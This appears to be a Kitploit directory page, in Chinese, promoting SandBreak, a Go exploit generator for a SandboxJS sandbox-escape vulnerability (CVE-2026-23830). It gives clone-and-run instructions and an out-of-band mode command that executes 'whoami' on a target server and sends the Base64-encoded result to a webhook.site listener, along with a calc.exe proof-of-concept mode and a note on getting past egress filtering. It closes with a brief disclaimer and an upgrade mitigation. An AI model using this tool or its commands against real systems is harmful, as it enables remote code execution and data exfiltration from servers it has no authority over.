Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-23830-SandBreak — 生成并投递针对 CVE-2026-23830(一个 SandboxJS 逃逸漏洞)的漏洞利用载荷,支持盲注带外(OOB)数据外泄模式和本地 calc 概念验证(PoC)模式。支持 HTTP/HTTPS 监听器,并生成压缩后的 JavaScript 载荷。 | Kitploit
工具/GitHubGitHub/galaxy-sc/cve-2026-23830-sandbreak
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHubgalaxy-sc/cve-2026-23830-sandbreak

CVE-2026-23830-SandBreak

生成并投递针对 CVE-2026-23830(一个 SandboxJS 逃逸漏洞)的漏洞利用载荷,支持盲注带外(OOB)数据外泄模式和本地 calc 概念验证(PoC)模式。支持 HTTP/HTTPS 监听器,并生成压缩后的 JavaScript 载荷。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
16个月前尚未审核

SandBreak

CVE-2026-23830 漏洞利用生成器与自动攻击工具

Go Version License Type

SandBreak 是一款基于 Go 的健壮漏洞利用生成器,旨在利用 SandboxJS 逃逸漏洞(CVE-2026-23830)。

该工具利用了旧版 sandboxjs 中未受保护的 AsyncFunction 构造函数,允许攻击者突破 V8 沙箱环境并在主机系统上执行任意代码。它支持多种载荷模式,包括 盲注 OOB 数据外泄、网页篡改 和 基于错误的 RCE。


功能特性

  • 2 种攻击模式:
    • oob:带外数据外泄(HTTP/HTTPS),适用于盲注场景。
    • calc:弹出 calc.exe(经典 PoC)。
  • 智能 OOB: 自动检测 HTTP 与 HTTPS,防止服务器崩溃。
  • 基于 Go: 单一二进制文件,攻击机无需任何依赖。
  • 轻量级: 生成纯净、压缩的 JavaScript 载荷。

安装

克隆仓库并运行:

root@kitploit:~
git clone https://github.com/Galaxy-sc/CVE-2026-23830-SandBreak.git
cd CVE-2026-23830-SandBreak
go run CVE-2026-23830.go

使用方法

root@kitploit:~
go run CVE-2026-23830.go -mode [MODE] -cmd [COMMAND] [OPTIONS]

1. OOB 模式(盲注 RCE - 专业级)

当没有输出反馈时使用此模式。它执行命令并将 Base64 编码的结果发送到你的监听器(例如 webhook.site)。

root@kitploit:~
go run CVE-2026-23830.go -mode oob -cmd "whoami" -url "https://webhook.site/YOUR-UUID"

通过处理网络错误,成功绕过基本的出口过滤崩溃问题。

2. Calc 模式(本地测试)

在 Windows 服务器上弹出计算器。

root@kitploit:~
go run CVE-2026-23830.go -mode calc

概念验证(PoC)

场景:OOB 数据外泄

尽管站点上没有可见输出,攻击者仍通过 Webhook 接收服务器的用户数据。


免责声明

本工具仅用于教育目的和授权渗透测试。

  • 请勿在你不拥有或未经明确许可的系统上使用此工具。
  • 作者不对因使用本工具造成的任何滥用或损害负责。

缓解措施

将 sandboxjs 升级到最新版本,其中 AsyncFunction 构造函数已得到妥善的沙箱保护。

root@kitploit:~
npm update sandboxjs

作者: Meysam Bal-afkan

许可证: MIT

下载工具